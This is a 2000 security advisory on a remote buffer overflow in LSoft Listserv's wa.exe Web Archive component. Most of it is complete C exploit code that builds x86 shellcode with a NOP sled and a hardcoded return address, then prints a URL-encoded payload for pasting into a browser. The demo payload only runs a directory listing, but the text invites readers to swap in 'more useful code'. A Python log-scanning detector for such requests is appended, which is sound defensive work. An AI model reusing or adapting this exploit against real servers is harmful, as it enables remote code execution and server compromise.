Listserv Web Archives Buffer Overflow

Reported May 03, 2000 by Cerberus Information Security
VERSIONS AFFECTED
  • LISTSERV's "WA" utility, version 1.8d and earlier

DESCRIPTION

The Cerberus Security Team has discovered a remotely exploitable buffer overflow in LSoft's Listserv Web Archive component (wa.exe). Listserv is one of the more popular software packages used for providing mailing lists. The Web Archive component allows mailing list operators to provide an archive of all messages sent to the mailing list via a web interface. Both the UNIX and Windows versions of the software are vulnerable.

In a lengthy advisory posted to Win2K Security Advice, David Litchfield of Cerberus explains that by making a specially formed request to the Web Archives it is possible to overflow a buffer, allowing arbitrary code to be executed and compromising the web server.

View the Cerberus Advisory in its entirety here.

DEMONSTRATION

Complete demonstration code was made available by Cerberus Security.

The sample code here is "proof of concept" only and will simply create a file called "cerberus.txt". More useful code is left as an exercise for the imagination of the reader.

/////////////////////////////////////////////////////////////////
//
//
// LSOFT's Listserv web archives wa.exe buffer overflow
//
//
// This is "proof of concept code" and will spawn a shell,
// perform a directory listing and redirect the output
// to a file called "cerberus.txt". Will work on Windows NT 4
// SP6a
//
//
// David Litchfield ([email protected])
//
//
// 1st May 2000
//
//
// Cut and paste the output into your web browser.
//
/////////////////////////////////////////////////////////////////

#include <stdio.h>

int main()
{
    unsigned char exploit[2000]="";
    int count = 0;

    // 100 NOPs (0x90) to land in
    while(count <100)
    {
        exploit[count]=0x90;
        count ++;
    }

    // push ebp
    exploit[count]=0x55;
    count ++;

    // mov ebp,esp
    exploit[count]=0x8B;
    count ++;
    exploit[count]=0xEC;
    count ++;

    // mov eax, 0x77f1a986
    exploit[count]=0xb8;
    count ++;
    exploit[count]=0x86;
    count ++;
    exploit[count]=0xa9;
    count ++;
    exploit[count]=0xf1;
    count ++;
    exploit[count]=0x77;
    count ++;

    // mov ebx, 0xffffffff
    exploit[count]=0xbb;
    count ++;
    exploit[count]=0xff;
    count ++;
    exploit[count]=0xff;
    count ++;
    exploit[count]=0xff;
    count ++;
    exploit[count]=0xff;
    count ++;

    // sub ebx, 0xffffff8B   (ebx = 0x74, i.e. 't' followed by three NUL bytes)
    exploit[count]=0x83;
    count ++;
    exploit[count]=0xeb;
    count ++;
    exploit[count]=0x8B;
    count ++;

    // Build "cmd.exe /c dir > cerberus.txt" on the stack, last dword first.
    // push ebx   (the terminating "t\0\0\0")
    exploit[count]=0x53;
    count ++;

    // push "xt.s"
    exploit[count]=0x68;
    count ++;
    exploit[count]=0x73;
    count ++;
    exploit[count]=0x2e;
    count ++;
    exploit[count]=0x74;
    count ++;
    exploit[count]=0x78;
    count ++;

    // push "ureb"
    exploit[count]=0x68;
    count ++;
    exploit[count]=0x62;
    count ++;
    exploit[count]=0x65;
    count ++;
    exploit[count]=0x72;
    count ++;
    exploit[count]=0x75;
    count ++;

    // push "rec "
    exploit[count]=0x68;
    count ++;
    exploit[count]=0x20;
    count ++;
    exploit[count]=0x63;
    count ++;
    exploit[count]=0x65;
    count ++;
    exploit[count]=0x72;
    count ++;

    // push "> ri"
    exploit[count]=0x68;
    count ++;
    exploit[count]=0x69;
    count ++;
    exploit[count]=0x72;
    count ++;
    exploit[count]=0x20;
    count ++;
    exploit[count]=0x3e;
    count ++;

    // push "d c/"
    exploit[count]=0x68;
    count ++;
    exploit[count]=0x2f;
    count ++;
    exploit[count]=0x63;
    count ++;
    exploit[count]=0x20;
    count ++;
    exploit[count]=0x64;
    count ++;

    // push " exe"
    exploit[count]=0x68;
    count ++;
    exploit[count]=0x65;
    count ++;
    exploit[count]=0x78;
    count ++;
    exploit[count]=0x65;
    count ++;
    exploit[count]=0x20;
    count ++;

    // push "cmd."
    exploit[count]=0x68;
    count ++;
    exploit[count]=0x63;
    count ++;
    exploit[count]=0x6d;
    count ++;
    exploit[count]=0x64;
    count ++;
    exploit[count]=0x2e;
    count ++;

    // mov ebx, esp   (ebx now points at the start of the command string)
    exploit[count]=0x8b;
    count ++;
    exploit[count]=0xdc;
    count ++;

    // xor esi, esi
    exploit[count]=0x33;
    count ++;
    exploit[count]=0xf6;
    count ++;

    // push esi
    exploit[count]=0x56;
    count ++;

    // push ebx
    exploit[count]=0x53;
    count ++;

    // call eax
    exploit[count]=0xff;
    count ++;
    exploit[count]=0xd0;
    count ++;

    // pad up to the return address with break points (int 3)
    while(count <420)
    {
        exploit[count]=0xCC;
        count ++;
    }


    // overwrite the return address

    exploit[count]=0x36;
    count ++;
    exploit[count]=0x28;
    count ++;
    exploit[count]=0xf3;
    count ++;
    exploit[count]=0x77;
    count ++;

    // put in 40 nops (0x90)

    while (count < 464)
    {
        exploit[count]=0x90;
        count ++;
    }

    // write our code that'll get us back into our un-tolower()ed string

    // mov edx, 0xFFFFFFFF
    exploit[count]=0xBA;
    count ++;
    exploit[count]=0xFF;
    count ++;
    exploit[count]=0xFF;
    count ++;
    exploit[count]=0xFF;
    count ++;
    exploit[count]=0xFF;
    count ++;

    // sub edx, 0xFFDFAC87
    exploit[count]=0x81;
    count ++;
    exploit[count]=0xEA;
    count ++;
    exploit[count]=0x87;
    count ++;
    exploit[count]=0xAC;
    count ++;
    exploit[count]=0xDF;
    count ++;
    exploit[count]=0xFF;
    count ++;

    // jmp edx
    exploit[count]=0xFF;
    count ++;
    exploit[count]=0xE2;
    count ++;

    // set readable part in memory to stop first AV

    exploit[390]=0x36;
    exploit[390]=0xf3;
    exploit[391]=0x77;

    // print every byte URL-encoded (%xx) so it can be pasted into the browser
    count = 0;
    while(count < 477)
    {
        printf("%%%x",exploit[count]);
        count ++;
    }

    return 0;
}
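An added detection example, not part of the Cerberus advisory or of LSoft's product: it scans constructed web-server log lines for requests to wa.exe whose query string is unusually long, decodes to mostly non-printable bytes, or contains a long run of a single byte value, which is the shape of the percent-encoded output the proof-of-concept above prints. The log format, the thresholds and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample log lines (not from the advisory). The third one carries a
# wa.exe request whose query is a long run of percent-encoded 0x90 bytes followed
# by code bytes and a 0xCC pad, the shape the proof-of-concept output takes.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/May/2000:10:01:02] "GET /scripts/wa.exe?A0=listname HTTP/1.0" 200 512',
    '10.0.0.7 - - [03/May/2000:10:01:05] "GET /index.html HTTP/1.0" 200 2048',
    '10.0.0.9 - - [03/May/2000:10:02:11] "GET /scripts/wa.exe?'
    + '%90' * 100 + '%55%8b%ec' + '%cc' * 300 + ' HTTP/1.0" 500 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value (NOP or int3 sled)."""
    best = run = 0
    for i, b in enumerate(data):
        run = run + 1 if i and data[i - 1] == b else 1
        best = max(best, run)
    return best


def analyse_request(url: str, max_query=256, max_run=16, max_binary=0.2) -> list:
    """Reasons a wa.exe request looks like an overflow attempt; [] when it looks normal."""
    path, _, query = url.partition('?')
    if not path.lower().endswith('/wa.exe'):
        return []  # only the Web Archives CGI is in scope
    reasons = []
    if len(query) > max_query:
        reasons.append(f'query length {len(query)} > {max_query}')
    raw = unquote_to_bytes(query)
    binary = sum(1 for b in raw if b < 0x20 or b > 0x7e)
    if raw and binary / len(raw) > max_binary:
        reasons.append(f'{binary}/{len(raw)} decoded bytes are non-printable')
    run = longest_run(raw)
    if run >= max_run:
        reasons.append(f'run of {run} identical bytes (sled)')
    return reasons


def scan_log(lines) -> list:
    """(line number, reasons) for every log line whose request trips analyse_request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        reasons = analyse_request(m.group(1)) if m else []
        if reasons:
            hits.append((n, reasons))
    return hits
```

Tune the thresholds against normal wa.exe traffic first; legitimate archive searches carry short, printable query strings, so all three checks should stay quiet on them.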


VENDOR RESPONSE

LSoft was made aware of this problem on April 28, 2000 and has informed us that a patch is forthcoming. LSoft asks that all customers follow proper customer support procedures to address this issue.

CREDITS
Discovered and reported by
Cerberus Information Security
